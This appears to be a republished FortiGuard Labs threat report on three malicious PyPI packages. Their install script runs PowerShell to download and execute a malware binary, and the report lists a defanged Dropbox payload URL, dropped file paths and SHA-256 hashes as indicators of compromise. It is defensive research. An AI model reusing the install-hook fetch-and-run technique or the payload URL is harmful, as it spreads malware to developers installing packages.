Lilip0p

10944149069?profile=RESIZE_180x180The FortiGuard Labs team has discovered a new 0-day attack embedded in three PyPI packages (Python Package Index) called ‘colorslib’, ‘httpslib’, and “libhttps”.  These were found on 10 January 2023, by monitoring an open-source ecosystem.  The Python packages “colorslib” and “httpslib” were published on 7 January 2023, and “libhttps” was published on 12 January 2023.  All three were published by the same author, ‘Lolip0p’, as shown in the official PyPI repository.  ‘Lolip0p’ joined the repository close to the publish date.

10944149079?profile=RESIZE_400xFigure 1.  Package author information

The author puts the project description that may look legitimate and clean as shown below.

10944148885?profile=RESIZE_400xFigure 2.  Project description of colorslib

10944148895?profile=RESIZE_400xFigure 3.  Project description of httpslib

10944149274?profile=RESIZE_400xFigure 4.  Project description of libhttps

All versions of these packages are malicious.

10944150278?profile=RESIZE_400xFigure 5.  Release history of colorslib

10944151052?profile=RESIZE_400xFigure 6.  Release history of httpslib

10944150700?profile=RESIZE_400xFigure 7.  Release history of libhttps

Interestingly, when we look at the setup.py script for these packages, we find they are identical.

10944151455?profile=RESIZE_584xFigure 8.  setup.py from all packages

They try to run a PowerShell with a suspicious URL that needs further analysis:

https://dl[.]dropbox[.]com/s/mkd3enun97s8zag/Oxzy[.]exe?dl=0

As shown in the VirusTotal entry below, the download URL includes the following binary exe (SHA 256):

8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b

While this download URL has not previously been detected by any other threat researchers, some vendors do flag the downloaded executable file as malicious.

10944151496?profile=RESIZE_400xFigure 9.  This URL has not been detected by VirusTotal

10944152067?profile=RESIZE_400xFigure 10.  Vendors that detect the downloaded executable Oxzv.exe

The downloaded executable is called ‘Oxyz.exe’. It drops another executable, ‘update.exe’, that runs in the folder ‘%USER%\AppData\Local\Temp\’

10944152268?profile=RESIZE_584xFigure 11.  Dropped file update.exe

As shown in the VirusTotal entry below, several vendors flag this binary exe as malicious (SHA 256):

293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757

10944152652?profile=RESIZE_400xFigure 12. Vendors that detect the dropped executable update.exe

When running ‘update.exe’, it drops a series of files to the folder ‘%USER%\AppData\Local\Temp\onefile_%PID_%TIME%’.

10944152692?profile=RESIZE_584xFigure 13.  update.exe running

10944153054?profile=RESIZE_400xFigure 14.  Dropped files

The dropped file, ‘SearchProtocolHost.exe’, is flagged as malicious by several vendors (SHA 256):

123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638

10944153264?profile=RESIZE_584xFigure 15.  Vendors that detect SearchProtocolHost.exe

Conclusion:  In this blog, we showed a single author posting separate Python packages that use the same code to launch an attack. The author also positions each package as legitimate and clean by including a convincing project description. However, these packages download and run a malicious binary executable.

Python end users should always perform due diligence before downloading and running any packages, especially from new authors. And as can be seen, publishing more than one package in a short time period is no indication that an author is reliable.

Malicious executables identified in this report as:

  • exe: Malicious_Behavior.SB
  • exe: PossibleThreat.PALLASNET.H
  • exe: Malicious_Behavior.SB

IOCs:

  • oxzy.exe
    • 8dc8a9f5b5181911b0f4a051444c22e12d319878ea2a9eaaecab9686e876690b
  • update.exe
    • 293a3a2c8992636a5dba58ce088feb276ba39cf1b496b336eb7b6f65b1ddb757
  • SearchProtocolHost.exe
    • 123fd1c46a166c54ad66e66a10d53623af64c4b52b1827dfd8a96fdbf7675638
  • Malicious URLs     https://dl[.]dropbox[.]com/s/mkd3enun97s8zag/Oxzy[.]exe?dl=0

Source: https://www.fortinet.com/blog/threat-research/supply-chain-attack-using-identical-pypi-packages-colorslib-httpslib-libhttps/

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@wapacklabs.com      

Weekly Cyber Intelligence Briefings:

  • Reporting: https://www. redskyalliance. org/   
  • Website:   https://www. wapacklabs. com/  
  • LinkedIn:  https://www. linkedin. com/company/64265941   

Weekly Cyber Intelligence Briefings:

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5504229295967742989  

 

 

E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!